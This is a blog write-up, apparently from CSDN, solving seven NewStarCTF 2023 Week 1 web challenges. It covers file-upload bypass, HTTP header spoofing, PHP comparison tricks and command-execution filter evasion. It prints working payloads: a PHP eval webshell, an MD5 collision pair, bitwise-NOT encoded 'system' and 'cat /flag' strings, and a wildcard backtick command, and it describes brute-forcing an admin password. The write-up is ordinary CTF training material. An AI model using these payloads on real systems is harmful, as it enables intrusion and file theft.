2023NewStarCtf WEB [WEEK1] 超详细题目思路wp

已于 2023-10-12 21:43:51 修改
阅读量428 收藏 2
点赞数 5
分类专栏: 各种ctf的wp合集 文章标签: 网络安全 web安全
于 2023-10-10 18:38:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76690905/article/details/133751735
版权

1、泄漏的秘密

扫描目录得到www.zip,下载到电脑后打开里面有index.php和robots.txt,点开得到两段flag,拼接得到完整flag

bde4361d6fcc4fb2a54e878b60c6f00d.png

 

2、Begin of Upload

这里上传一句话木马,抓包后修改content-type:image/png绕过检测,这里使用的木马是

php phpinfo(); @eval($_POST['shell']);

ad430173af614ca9ab2f356c242a0afd.png

这里看见php信息说明木马上传成功,用蚁剑链接flag在根目录下

cb181f7c4fa543c7be585d1fdc8e8f2b.png

3、Begin of HTTP

以闯关形式做题,最后抓包修改后的内容如下。

User-Agent:后面表示的是服务器

referer后面改为newstarctf.com,加上X-Forworded-For:127.0.0.1,把所有有网址的地方都改为127.0.0.1

431fe723ede04225a22fb828ca8ee131.png

 

4、ErrorFlask

简单测试了一下就在源码出现了flag

?number1=2&number2=__class__

ddd59a6150694189bdb7a56b6f52282c.png

5、Begin of PHP

题目如下

 <?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

9e378a10c11a4e7185da80ca86747811.png

key1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

key2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

这是一对MD5值相同但是本身不相同的东西,或者这里用数组绕过也行key1[]=1&key2[]=1

!is_number确保传参的没有数字,这里要求传入的数大于2023但是不能输入数字,我们可以用%00截断绕过或者在2024后面加字母,比如2024%00,2024admin,php的弱比较也能用这种方式绕过

完整payload:

key1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&key2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&key4[]=1&key5=2024%00

最后个条件困了我挺久,以为是检测整个post请求体都不含字母数字,其实不是,最后两个都是空格,payload:

flag5= &key3[]=

原理如下:

先用extract把post方法传的数据提取成一个个参数,两个传的都是空格,哪怕给flag5传的是空格,服务器也是认为flag5存在的


6、rce

php在接收参数的时候发现表单名有点号(.)或者空格( )的时候会自动把它们转化为下划线,e_v.a.l会变成e_v_a_l被服务器接受,自然无法命令执行。但是php会把表单名里的[自动转化为_

68ea3928933841838cc0f72502d61921.png

这里使用了取反绕过,得到system的编码后把system替换为cat /flag得到另一个编码,最后在这两个括号里分别填上编码,第一个括号填system的,第二个填cat /flag的(~)(~);

<?php
$a=urlencode(~'system');
echo $a;
?>

a6a30319844245be9bdb7d5b58d737d8.png

payload:

(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

 当然也可以使用简单的模糊绕过比如:

e[v.a.l=echo `ta? /fl*`;

7、login

用brupsuite爆破admin的密码得到密码000000

登录后进入一个交互界面,其实在这个时候翻一下历史包搜flag关键词就能找到flag

812bd8b8af83a7da56496fd6524b24e8.png

如有错误欢迎指出

 

 

 

 

 

 

 

 

时代少年团队长乌萨奇的颜值一直被质疑
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF NewStarCTF 2023 WEBWP
qq_65165505的博客
10-07 2522
NewStarCTF 2023 公开赛道 web题目wp
2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~
jayq1的博客
10-02 1400
本篇文章在web方面属于中规中矩的解法,师傅们看着玩叭,在crypto方面是有一些知识扩展的,包括仿射密码、连分数等~
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 601
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
高级PHP应用程序漏洞审核技术
weixin_34235457的博客
08-03 320
https://code.google.com/archive/p/pasc2at/wikis/SimplifiedChinese.wiki 前言 PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大型门户网站。而且很多具名的web应用系统(包括bb...
NewStarCTF 2023 公开赛道 Web
m0_73728268的博客
11-05 2920
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那道两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
web week one
01-20
web week one 任务 1.安装phpstudy,python,JAVA(jdk8)并配置好相关的环境,安装常用工具burpsuit,kali等; 2.学习HTTP协议(请求与响应),学习利用burpsuite 实现简单的抓包改包; 3.掌握PHP的基本语法、数据...
xdoj-week1-题解
05-12
压缩包文件名为"XDOJ-week1",很可能包含的是每道题目的题解文档,比如Markdown格式的文本文件或者PDF,这些文档可能会详细阐述解题思路,给出关键的算法步骤,甚至包括优化后的源代码示例。学习者可以通过阅读这些...
cs50web:webdev week.1
03-29
【cs50web:webdev week.1】是哈佛大学CS50课程的网络开发部分第一周的内容,主要聚焦在Web开发的基础知识上,特别是与Python语言相关的技术。这一周的学习旨在为初学者构建一个坚实的Web开发基础,涵盖了一系列关键...
open-edu-web-server-week1
03-06
【标题】"open-edu-web-server-week1" 涉及的是一个关于Web服务器学习的课程,很可能是某个在线教育平台第一周的教学内容。在这个主题下,我们将深入探讨Web服务器的基础知识,特别是与HTML相关的部分。 【描述】...
吴恩达神经网络WEEK1实验2代码内容
05-20
1. **卷积层**:卷积层是CNN的核心组成部分,它通过应用一系列可学习的滤波器对输入图像进行卷积操作,生成特征映射(feature maps)。 2. **滤波器(Filters)**:滤波器是一组权重,它们与输入图像的部分区域进行...
php判断get值不是数字,PHP @而不是isset来测试$_GET值
weixin_29117669的博客
04-12 303
给我一个很好的理由这样做if( isset($_GET['key']) && ($_GET['key'] === '123') ){...而不是这个if( @$_GET['key'] === '123' ){...我要求这个非常具体的代码案例,而不是一般的!以下原因不受欢迎:>“使用@会使应用程序减慢几纳秒,因为无论如何都会产生错误(即使它被压制).“好吧,我更喜欢慢代码但更...
NewStarCTF 2023 公开赛道部分wp
m0_66458291的博客
10-02 432
参加NewStarCTF 2023 公开赛道将自己做出来的题目进行总结一下,包括web和密码学两个部分的部分题目
关于ctf中flask算pin总结
arcuied
02-20 4584
flask pin的相关问题
flask学习知识点总结
zhangli709的博客
05-19 414
flask summary 学习网址 http://docs.jinkan.org/docs/flask/installation.html environment 配置flask单独的虚拟环境 pip3 install virtualenv virtualenv –no-site-packages -p python3路径 py3flask cd py3flask/Script ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8324
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全的神秘世界】SQL注入(下)
weixin_54750312的博客
07-04 1421
通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到 addslashes() 函数时,单引号会被转义,导致我们用来判断注入点的单引号失效。在将数据存入到了数据库中之后,开发者就认为数据是可信的。通过前面的学习可以了解到,SQL注入非常关键的一步就是让引号闭合和跳出引号,无法跳出引号,那么输入的内容就永远在引号里,即永远是字符串,无法实现SOL注入。出现了语法错误,意味着输入的内容会到数据库中进行查询,接下来的步骤就很简单了,跟前面的报错注入是一样的。
网络安全&密码学—python中的各种加密算法
xt350488的博客
07-02 1074
数据加密是一种保护数据安全的技术,通过将数据(明文)转换为不易被未经授权的人理解的形式(密文),以防止数据泄露、篡改或滥用。加密后的数据(密文)可以通过解密过程恢复成原始数据(明文)。数据加密的核心是密码学,它是研究密码系统或通信安全的一门学科,包括密码编码学和密码分析学。在网络安全和密码学领域,数据加密是保护数据机密性、完整性和可用性的关键技术。Python作为一种功能强大的编程语言,提供了多种实现数据加密和解密的方法。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 948
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Java中的网络安全与防护策略
最新发布
技术研究中心
07-04 454
通过本文的讨论,我们深入了解了Java中面临的网络安全挑战以及如何有效应对这些挑战的策略和方法。开发人员在设计和实现Java应用程序时,应始终牢记网络安全的重要性,并采取适当的防护措施,确保系统和数据的安全性。在Java中,可以使用正则表达式或者现成的验证框架,如Spring框架中的数据绑定和验证功能(例如Spring MVC的。在当今信息化时代,网络安全问题日益突出,尤其对于Java开发者来说,保障应用程序和数据的安全至关重要。同时,应用HTTPS协议确保数据在传输过程中的安全性。注解)来实现输入验证。
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两道题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值